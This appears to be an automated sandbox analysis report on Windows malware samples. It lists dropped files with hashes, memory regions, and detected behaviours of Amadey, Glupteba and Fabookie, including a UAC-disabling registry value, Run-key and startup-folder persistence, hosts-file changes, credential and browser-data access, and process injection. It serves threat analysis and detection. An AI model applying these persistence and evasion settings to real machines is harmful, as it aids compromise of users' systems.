memory/1020-667-0x0000000000D40000-0x0000000000D80000-memory.dmp

memory/2592-695-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1816-673-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1068-700-0x000000013F7F0000-0x000000013FD33000-memory.dmp

memory/2308-701-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/900-704-0x0000000004A00000-0x0000000004A40000-memory.dmp

memory/1328-705-0x00000000031A0000-0x00000000032D1000-memory.dmp

memory/1744-706-0x0000000000CF0000-0x0000000000D70000-memory.dmp

memory/372-707-0x00000000024E0000-0x00000000024E1000-memory.dmp

memory/1068-738-0x000000013F7F0000-0x000000013FD33000-memory.dmp

memory/564-739-0x0000000002630000-0x0000000002A28000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/1744-736-0x000007FEF4F80000-0x000007FEF596C000-memory.dmp

memory/2796-745-0x0000000000400000-0x0000000000513000-memory.dmp

memory/2308-741-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1340-748-0x0000000000400000-0x000000000046A000-memory.dmp

memory/2308-749-0x0000000002A70000-0x000000000335B000-memory.dmp

memory/440-750-0x00000000006E0000-0x00000000007E0000-memory.dmp

memory/440-754-0x0000000000220000-0x000000000025E000-memory.dmp

memory/440-755-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/1540-757-0x0000000073F20000-0x000000007460E000-memory.dmp

memory/1540-759-0x0000000000A20000-0x0000000000DAE000-memory.dmp

memory/2096-786-0x0000000002230000-0x0000000002694000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NO1NR40C\s54[1].htm

MD5 e1671797c52e15f763380b45e841ec32
SHA1 58e6b3a414a1e090dfc6029add0f3555ccba127f
SHA256 3f79bb7b435b05321651daefd374cdc681dc06faa65e374e38337b88ca046dea
SHA512 87c568e037a5fa50b1bc911e8ee19a77c4dd3c22bce9932f86fdd8a216afe1681c89737fada6859e91047eece711ec16da62d6ccb9fd0de2c51f132347350d8c

memory/440-795-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/2388-797-0x00000000026E0000-0x0000000002AD8000-memory.dmp

memory/2628-798-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1376-800-0x0000000000400000-0x00000000005C2000-memory.dmp

memory/440-849-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/1376-852-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2096-860-0x0000000000400000-0x0000000000A00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Admin.bmp

MD5 343fa15c150a516b20cc9f787cfd530e
SHA1 369e8ac39d762e531d961c58b8c5dc84d19ba989
SHA256 d632e9dbacdcd8f6b86ba011ed6b23f961d104869654caa764216ea57a916524
SHA512 7726bd196cfee176f3d2002e30d353f991ffeafda90bac23d0b44c84c104aa263b0c78f390dd85833635667a3ca3863d2e8cd806dad5751f7984b2d34cafdc57

memory/2096-918-0x0000000003720000-0x0000000003F12000-memory.dmp

memory/2968-919-0x000000013F0F0000-0x000000013F633000-memory.dmp

memory/2096-926-0x00000000003F0000-0x00000000003F1000-memory.dmp

memory/2096-939-0x0000000004020000-0x0000000004160000-memory.dmp

memory/2096-947-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

memory/2096-948-0x0000000004020000-0x0000000004160000-memory.dmp

memory/2096-927-0x0000000004020000-0x0000000004160000-memory.dmp

memory/2096-949-0x0000000004020000-0x0000000004160000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b3075857a467b8ad364dd31d6e934628
SHA1 10237f1b69595b6335a68ee707bd8b8bf98b1f1b
SHA256 283edee83cbba9228591ac901cf934a1f5d7ae4a046121d2559525ccaa9fd2bd
SHA512 d2208a3796ec8354ab5b7fc2c0603f191184485f237d64fefab59a9cf25c3a086f0d013663356a722448a6997495bc96800975faed456008ac4b7ae359f14962

memory/2096-958-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

memory/2096-967-0x0000000004020000-0x0000000004160000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d27e438077b3d7e668e1fc0f15ab57f9
SHA1 517f7baeb4f0092967fbe39ca1acbd00412324ed
SHA256 6ee76435cfc126169503fd96d5e0b8596be7bd07e411d9180b94106486d4659c
SHA512 6f744b86109c3c58c0000ec279b2eec5191e1edd70613917079760eae1db0e939932dfc69f9c69c554af90b4c39faebc565f420c887bbfca1c276a68974cf162

C:\ProgramData\48148754005569487756436495

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a843fe3264434ee444d2df4414fb3dec
SHA1 1facc2ff2d0585234c969831ae2ef4f864c83d88
SHA256 49f1f9152ab66059f21255dd3e422c410f5ee958eb8e3cc6eb0a53321c1ac8c0
SHA512 88aa3d92644345911aa2071f0f404b82c5a9b1d0df9e1e451ce30c8e783b4ec877640c6f78476cc3604f3f3da96f6bb8117cfb1b7e7962e10a14728049115fd3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 48d964524a6076f728081b69dd5ac9d6
SHA1 ea187bb2ce19f58a082d63de0bf3e0361db7b0b2
SHA256 b948f862a090f6e41c2989d2198b1ec871e98df07b9c3cb4c6c1d1423c95a83f
SHA512 2e827abef1634fdc8e858a5e846bcd1783141ac3a40f8979feb96d5ea82996a05c3b546229498be613b5a725a9c1631909c36034dd10ef808e415ac8d4bef91f

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 16c5b06f00f302535b41d6d5cfe87272
SHA1 bb27f7eb6142d70cae1a6f20d375216e6628c67a
SHA256 2efa91d3a3f561062caf2d151fc6e7d8548bba35ec68a49145d9740bc1b32c12
SHA512 4428b600060fa56d06b82d80ad1598541c45b2d58551e8475448ac1a45e364816f832e4639e09d0beba86046129c799ca442a4d8059902a0e797847dda421eb1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2SBOE92S\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-05 04:49

Reported

2023-10-05 04:54

Platform

win10-20230915-en

Max time kernel

183s

Max time network

299s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STe8zMNkZx49l6tUzxyCaE3s.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkjhTle4mYByu4UtWNyhKnSP.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S8PPwvDWEb0C1FwH7RUYuIno.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chHai2fRstUaQMki9DJeKkq7.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QjdcxAdqghsThluvntaHeHXx.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H5S4GLbgBBIv6htR4CmgZCYJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aumZElmi7f9DEiRDbhSUTdU6.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CxHSb22ork2CKE6k5zWmaUR1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F33FGmUCYqofPk74eiDNpPQE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uoABWjJrnGZPf1RXgI4GRReA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I29YNtRJQghKgeB5h5qW6sXr.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AlSUeUnZZ3aVcFZW7YL6GKky.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\y8bMsEztqBJyOIs5ehrQweY9.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe N/A
N/A N/A C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe N/A
N/A N/A C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe N/A
N/A N/A C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe N/A
N/A N/A C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
N/A N/A C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
N/A N/A C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp N/A
N/A N/A C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp N/A
N/A N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
N/A N/A C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe N/A
N/A N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-UJ6HF.tmp\_isetup\_setup64.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
N/A N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
N/A N/A C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ZJOHAHEIQG\lightcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
N/A N/A C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Windows\CurrentVersion\Run\DigitalPulse = "\"C:\\Users\\Admin\\AppData\\Roaming\\DigitalPulse\\DigitalPulseService.exe\" 5333:::clickId=:::srcId=" C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Xaetyfahubi.exe\"" C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\daf969ecb631e937d67df09267ac5f9bfcd533b0d5c5ddabc1a7f6148d560c95.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5104 set thread context of 2344 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 5104 set thread context of 2980 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe
PID 5360 set thread context of 5352 N/A C:\Users\Admin\AppData\Local\Temp\0709047991.exe C:\Windows\servicing\TrustedInstaller.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\LightCleaner\is-QI5RE.tmp C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-J30MM.tmp C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-ND3KL.tmp C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\Reference Assemblies\Xaetyfahubi.exe C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Xaetyfahubi.exe.config C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\LightCleaner.exe C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\VTRegScan.dll C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-0Q6KL.tmp C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-GL8T5.tmp C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\servicing\TrustedInstaller.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\servicing\TrustedInstaller.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
